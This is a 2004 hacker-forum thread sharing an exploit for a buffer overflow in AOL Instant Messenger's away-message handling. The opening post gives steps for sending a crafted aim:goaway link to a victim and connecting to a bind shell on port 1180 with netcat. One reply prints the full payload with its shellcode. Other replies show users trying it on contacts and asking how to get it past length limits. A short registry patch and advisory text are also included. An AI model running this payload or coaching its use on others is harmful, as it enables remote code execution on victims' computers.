[illwill]

AIM AWAY MSG sploit
author: mandragore
Compiler/ReadME: illwill
Credit:
Discovery is credited to Ryan McGeehan and Kevin Benes.
Matt Murphy is credited with discovery as well.



INSTRUCTIONS:
Extract Files in Zip
from commandline type:
c:\>aim-away.exe >owned.txt
open owned.txt and paste contents
into IM window and send to someone
with an away message on. You
Should be able to connect to them
on port 1180

Use Netcat:
nc -v xxx.xxx.xxx.xx 1180


- Peace Out
illwill


-------------------------------------------------------------------------
p.s. quick and simple patch to avoid someone doing this to your AIM

======= neuteraimurl.reg =======
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler\aim]
"CLSID"="{3050F406-98B5-11CF-BB82-00AA00BDCE0B}"
======= neuteraimurl.reg =======

or download the newest AIM beta release

-------------------SPLOIT INFO:-------------------------------------------
The vulnerability is caused due to a boundary error within the handling
of "Away" messages and can be exploited to cause a stack-based buffer
overflow by supplying an overly long "Away" message (about 1024 bytes).
A malicious website can exploit this via the "aim:" URI handler by
passing an overly long argument to the "goaway?message" parameter.

Successful exploitation allows execution of arbitrary code on a user's
system when e.g. a malicious website is visited with certain browsers.

The vulnerability has been confirmed in version 5.5.3595. Other versions
may also be affected.

Attached File(s)

•  aim_away.zip (16.23K)
  Number of downloads: 373

[BeNiNuK]

very nice find dude! this 1 could be big!

[loot]

really great work ILLwill :>
thx a lot

[TRi]

Interesting, thanks for the detailed advisory + exploit :)

[yamahacal]

Nice, I tried it out with a buddy and AIM would say its too many characters and GAIM sends it but it is "refused by client". Maybe I'm missing a step or something. Or AIM patched it already O_o

[Hellraiseruk]

Nice Job M8 sadly im a msn freak hehe ;)

[MrTus]

doesnt work. Buffer overflow crashes aim alright, but spawns no shell. Anyone else figure it out?

[Flowby]

Hmmm i also tryed it...i conected direct to aim friend...then both turned firewals of
and i when to the exe and i got error???
Strange!and my aim crashed!!i didnt even got to the part where the exe makes a text file!! :blink:

[prog]

yea tells me the msg is too long
it gets refused

[SecureD]

witch port is aim anyway? ;)

[prog]

peerke, on Aug 15 2004, 11:23 AM, said:

witch port is aim anyway? ;)

Open aim, press F3, this will take you to aim options or preferances, same thing really
then click on sign on/off
and then click 'connection' its a button in the bottom right
common default i believe is 5190

[Terminal]

Flowby, on Aug 15 2004, 07:51 AM, said:

Hmmm i also tryed it...i conected direct to aim friend...then both turned firewals of
and i when to the exe and i got error???
Strange!and my aim crashed!!i didnt even got to the part where the exe makes a text file!! :blink:

Exe makes text file . Here's text file

start
--
aim:goaway?message=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�AA�U
AAAA��4$3ɀ���6�F���������W�`z��޶���޶���?�!�V���IG���������?�!�!M�޶���BU�Ύ?�܉!�!��?�Ӊ!�!�ފ?�߉!�!U��·U"��'�-uU������ߎ�6���޽��ގ6����?��������������ٚ������]�Muuu����U��U��U�!��!�!AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
AAAAAAAAAAAAAAAAAAAA
--End

[Reaper527]

well, i'm able to crash myself, i guess thats a start, however if i try to send the message to someone else it says that there are too many characters, if i try to get rid of some of the A's, it will paste in, and about 3/4 of the message turns into a hyperlink automatically and i get a message saying its to many characters when i try sending. i'm going to see if i can disable whatever is causing it to turn into a link. i crashed myself by putting the link in my Mozilla address bar. (i had to get rid of some of the A's before mozilla would even think about using it though) great exploit, i'm sure someone here will figure out how to get it working properly.

----edit----
forgot to mention, if i do insert text from file, i can insert the entire owned.txt file, however it can't be sent.

[Logan]

hyperlink gets cut off before the code anyway (tried doing it while DCd)

btw- you will only see the other's IP if you're directly connected, 5190 is the AIM servers.. 4443 is the DC port unless it changed

anyone get it to work?

[JaG]

prog, on Aug 15 2004, 03:49 AM, said:

yea tells me the msg is too long
it gets refused

im having the same problem. anyone know which client will allow me to send the xploit?


thnx :)